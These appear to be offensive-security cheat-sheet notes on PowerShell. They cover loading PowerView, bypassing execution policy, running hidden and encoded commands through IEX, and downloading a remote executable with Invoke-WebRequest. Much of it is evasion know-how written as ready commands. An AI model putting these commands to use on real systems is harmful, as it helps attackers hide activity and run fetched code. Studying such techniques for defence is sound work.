Module import
Import-Module Recon
Import-Module -name .\powerview.ps1
View module corresponding commands
Get-Command -Module name
other
powershell.exe -ExecutionPolicy bypass -noprofile IEX('') The
above command means
1. Set the execution policy to bypass so that the powershell script file can be executed.
2. Do not load the configuration file.
3. Hide the window.
4. The Iex command is an alias of the invoke-expression: Receive a string as the complete command to be run (including parameters).
| name | usage |
|---|---|
| -Command | The code to be executed |
| -ExecutionPolicy | Set the default execution strategy, generally use Bypass |
| -EncodedCommand | Execute Base64 code, which can be used when confused by powershell |
| -File | This is the name of the script to be executed |
| -NoExit | After executing the command, it will not exit immediately. For example, when we execute powerhsell whoami, our PS session will be launched after the execution is completed. If we add this parameter, we will continue to stay on the PS interface after running. |
| -NoLogo | Do not output PS banner information |
| -Noninteractive | Do not open an interactive session |
| -NoProfile | Do not use the configuration file used by the current user |
| -Sta | Start ps in single-threaded mode |
| -Version | Set what version to use to execute code |
| -WindowStyle | Set the execution window of Powershell, there are the following parameters Normal, Minimized, Maximized, or Hidden, generally use hidden |
ep bypass= -ExecutionPolicy bypass
IEX(‘echo hello’) = invoke-expression(‘echo hello’)
-WindowStyle hidden
Bypass the powershell execution strategy
In cmd: powershell -ep bypass
powershell: Set-ExecutionPolicy Bypass -Scope Process
You can also refer to the following link to
bypass the powershell execution strategy
powershell download remote data
powershell (Invoke-WebRequest -Uri "https://github.com/HoldOnToYourHeart/nc/raw/cafb11118be48803396d472ca85c3e7c099b4891/calc.exe" -OutFile "C:\Users\31030\Desktop\tools\test\calc2.exe")
Powershell function parameter transfer related
But when we want to transmit the powershell command, if the parameter contains a single quotation mark "'", then we need to escape it. The way to escape is to add a single quotation mark before it. And when the powershell function passes parameters, try to expand the single quotes. The system will only transmit the content between the two single quotes as a string instead of as a command, which reduces the probability of error.